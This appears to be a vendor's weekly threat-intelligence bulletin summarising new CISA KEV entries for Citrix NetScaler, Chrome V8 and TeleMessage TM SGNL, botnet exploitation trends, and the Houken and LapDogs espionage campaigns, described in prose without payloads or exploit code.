This week in cybersecurity, several critical vulnerabilities and active threats underscored the evolving risk landscape. Four new vulnerabilities were added to the CISA KEV catalog, including two in the TeleMessage TM SGNL messaging app, notably used by former U.S. National Security advisor, raising alarms over the security of sensitive communications. Vulnerabilities from Google Chrome and Citrix were also included. Meanwhile, ReliaQuest reported with medium confidence that the Citrix vulnerability is actively exploited in the wild, though Citrix has not yet confirmed this activity.

Simultaneously, botnet-driven exploitation campaigns intensified, with malware families such as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st targeting unpatched systems in platforms like GitLab, Cloud Gateway, and PHP-based services. IoT botnets, including Bashlite, BrickerBot, Tsunami, and Mirai also ramped up attacks on Eir D1000 models, rapidly infecting exposed internet-facing devices.  

This week saw the emergence of two major cyber-espionage campaigns. "LapDogs", uncovered by SecurityScorecard, used the ShortLeash backdoor to compromise over 1,000 SOHO devices across the U.S. and Asia via long-patched vulnerabilities. Meanwhile, France’s ANSSI reported a campaign by the Chinese-linked group “Houken”, exploiting Ivanti CSA zero-days to target sectors like government, finance, and telecom.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping  to make informed decisions.  

CVE-2025-5777
An Insufficient Input Validation Vulnerability in the Citrix NetScaler ADC and Gateway has raised critical security concerns, earning a CVSS Score of 9.3. The flaw, now formally referred to as "Citrix Bleed 2", stems from improper handling of user input, which could allow threat actors to gain unauthorized access or exfiltrate sensitive data. Although Citrix has released updated builds to address the issue across all affected versions, ReliaQuest has reported with minimum confidence that the vulnerability is already being exploited in active attacks, particularly as an initial access vector into enterprise networks. Organizations are strongly urged to apply the latest patches immediately to reduce the risk of compromise.

CVE-2025-6543
A Buffer Overflow Vulnerability in the Citrix and NetScaler Gateway has been actively in the wild. Assigned a critical CVSS Score of 9.2, the flaw could lead to denial of service or unintended control flaw. Citrix observed attacks on unpatched appliances, though technical details remain undisclosed. Successful exploitation requires the appliance to be configured in Gateway mode, including VPN virtual server, ICA Proxy, CVPN, RDP Proxy, or AAA virtual server. The vulnerability has been added to the CISA’s Known Exploited Vulnerabilities (KEV) catalog, and Citrix has released urgent patches urging organizations to update immediately.

CVE-2025-6554
A Type Confusion Vulnerability in the V8 JavaScript engine of Google Chrome that enables remote attackers to perform arbitrary read and write operations via a specially crafted HTML page. Assigned with a high CVSS Score of 8.8, this flaw affects Chrome versions prior to 138.0.7204.96 and may also impact other Chromium-based browsers such as Microsoft Edge and Opera. Google has issued patches for Windows (138.0.7204.96/.97), macOS (138.0.7204.92/.93), and Linux (138.0.7204.96), with updates being rolled out gradually. As the vulnerability is under active exploitation, it has also been added to the CISA KEV catalog, reinforcing the urgency of applying the updates.

CVE-2025-48927
An Initialization of Resource with an Insecure Default Vulnerability has been identified in the TeleMessage TM SGNL application, stemming from the exposure of a heap dump endpoint via the /heapdump URI due to insecure Spring Boot Actuator configurations. This flaw enables unauthorized access to in-memory data, potentially exposing sensitive information such as session tokens, authentication credentials, and other confidential artifacts. CISA has added this flaw to its Known Exploited Vulnerabilities (KEV) catalog and strongly urges organizations to apply vendor-provided mitigations immediately. If no adequate mitigations are available, CISA further recommends discontinuing use of the affected product to prevent potential compromise.

CVE-2025-48928
An Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability has been discovered in the TeleMessage TM SGNL application. The flaw arises from a JSP-based implementation where the heap content, acting similarly to a core dump, may unintentionally expose sensitive information such as passwords previously transmitted over HTTP. Recognizing the severity of this issue, CISA has added this vulnerability to its KEV catalog. Organizations are strongly advised to apply vendor-recommended mitigations immediately. In the absence of effective mitigations, CISA recommends discontinuing the use of the affected product to avoid potential security breaches.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

Chinese threat actors "Houken" exploits Ivanti Zero-days

The French Cybersecurity Agency (ANSSI) has disclosed a targeted cyber espionage campaign impacting multiple sectors in France, including government, telecommunications, media, finance and transport. The campaign, first detected in September 2024, is attributed to a Chinese threat actor identified as Houken, which exhibits operational and tooling overlaps with UNC5174, previously tracked by Google Mandiant. This campaign stands out for its exploitation of zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices to compromise critical infrastructure and harvest sensitive credentials.

The attackers weaponize CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190 to gain initial access and establish long-term persistence. These zero-days are used in three observed methods: the direct deployment of PHP web shells, the modification of existing PHP scripts to inject web shell functionality, and the installation of a malicious kernel module functioning as a rootkit. The use of multiple persistence techniques and chaining of unpatched vulnerabilities underscores the sophistication of the Houken intrusion set and its alignment with advanced Chinese cyber operations.

LapDogs Espionage Campaign

Security researchers from SecurityScorecard have uncovered a sophisticated cyber-espionage campaign dubbed LapDogs, which leverages a covert network of over 1000 compromised SOHO devices, including routers, NAS systems, and IP cameras across the United States, Southeast Asia, Japan, South Korea, Hong Kong and Taiwan.  

The attackers deployed a custom backdoor known as “ShortLeash” delivered via malicious shell scripts and exploitation of known, long-patched vulnerabilities, including CVE-2017-17663 and CVE-2015-1548. These vulnerabilities were used to gain initial access to Linux-based SOHO infrastructure, although variants targeting Windows systems have also been observed. The tactics, techniques, and procedures (TTPs) used in the operation closely align with activity attributed to Chinese nation-state threat actors, particularly the group tracked as UAT-5918. However, it remains unclear whether this group is directly operating the campaign or simply leveraging access provided by others.  

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/07/02/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog  
3. https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-adds-one-known-exploited-vulnerability-catalog  
4. https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_30.html
5. https://securityscorecard.com/wp-content/uploads/2025/06/LapDogs-STRIKE-Report-June-2025.pdf
6. https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/
7. https://www.cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-009/